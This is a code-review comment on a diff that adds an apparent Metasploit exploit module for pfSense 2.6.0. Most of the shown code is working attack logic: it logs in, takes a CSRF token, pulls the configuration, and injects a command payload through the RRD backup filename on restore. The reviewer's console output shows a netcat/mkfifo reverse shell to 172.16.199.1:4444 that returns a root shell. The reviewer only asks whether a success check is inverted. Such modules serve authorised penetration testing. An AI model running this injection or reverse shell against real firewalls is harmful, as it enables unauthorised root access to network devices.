modules/exploits/unix/http/pfsense_config_data_exec.rb

```diff
@@ -0,0 +1,243 @@
+    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')
+    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')
+    post_data.add_part('Download configuration as XML', nil, nil, 'form-data; name="download"')
+    post_data.add_part('', nil, nil, 'form-data; name="restorearea"')
+    post_data.add_part('', 'application/octet-stream', nil, 'form-data; name="conffile"')
+    post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s,
+      'keep_cookies' => true
+    )
+
+    if res && res.code == 200 && res.body =~ /<rrddatafile>/
+      return res.body
+    else
+      return nil
+    end
+  end
+
+  def exploit
+    unless login
+      fail_with(Failure::NoAccess, 'Could not obtain the login cookies!')
+    end
+
+    csrf = get_csrf('diag_backup.php', 'GET')
+    unless csrf
+      fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when starting exploitation!')
+    end
+
+    config_data = drop_config
+    if config_data.nil?
+      fail_with(Failure::UnexpectedReply, 'The drop config response was empty!')
+    end
+
+    if (%r{<filename>(?<file>.*?)</filename>} =~ config_data).nil?
+      fail_with(Failure::UnexpectedReply, 'Could not get the filename from the drop config response!')
+    end
+    config_data.gsub!(' ', '${IFS}')
+    send_p = config_data.gsub(file, "WAN_DHCP-quality.rrd';#{payload.encoded};")
+
+    post_data = Rex::MIME::Message.new
+
+    post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"')
+    post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"')
+    post_data.add_part('yes', nil, nil, 'form-data; name="donotbackuprrd"')
+    post_data.add_part('yes', nil, nil, 'form-data; name="backupssh"')
+    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')
+    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')
+    post_data.add_part('rrddata', nil, nil, 'form-data; name="restorearea"')
+    post_data.add_part(send_p.to_s, 'text/xml', nil, "form-data; name=\"conffile\"; filename=\"rrddata-config-pfSense.home.arpa-#{rand_text_alphanumeric(14)}.xml\"")
+    post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')
+    post_data.add_part('Restore Configuration', nil, nil, 'form-data; name="restore"')
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s,
+      'keep_cookies' => true
+    )
+
+    if res && res.code == 200 && res.body =~ /The configuration area has been restored\. The firewall may need to be rebooted\./
```

Comment:
After some testing I'm wondering if this `if` statement was written correctly and if it should be inverted.

After running the module 10 times consecutively, I got sessions 8 of the 10 times. Every time I got a session the `if` statement was false, every time I did not get a session the if statement was true:
```
msf6 exploit(unix/http/pfsense_config_data_exec) > run

[+] mkfifo /tmp/vsiseot; nc 172.16.199.1 4444 0</tmp/vsiseot | /bin/sh >/tmp/vsiseot 2>&1; rm /tmp/vsiseot
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target appears to be running pfSense version 2.6.0-RELEASE, which is unpatched!
[*] Command shell session 5 opened (172.16.199.1:4444 -> 172.16.199.173:43259) at 2023-07-10 12:28:27 -0400
[-] The new configuration doesn't appear to have been applied!
[-] Please rerun the exploit with the HTTPTRACE option set to true and try debug the issue!

id
uid=0(root) gid=0(wheel) groups=0(wheel)
exit
[*] 172.16.199.173 - Command shell session 5 closed.
msf6 exploit(unix/http/pfsense_config_data_exec) > run

[+] mkfifo /tmp/dmylh; nc 172.16.199.1 4444 0</tmp/dmylh | /bin/sh >/tmp/dmylh 2>&1; rm /tmp/dmylh
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target appears to be running pfSense version 2.6.0-RELEASE, which is unpatched!
[+] The configuration was successfully changed, please await your shell!
[*] Exploit completed, but no session was created.
```

I can see Grant added this - wondering what his thought process was here.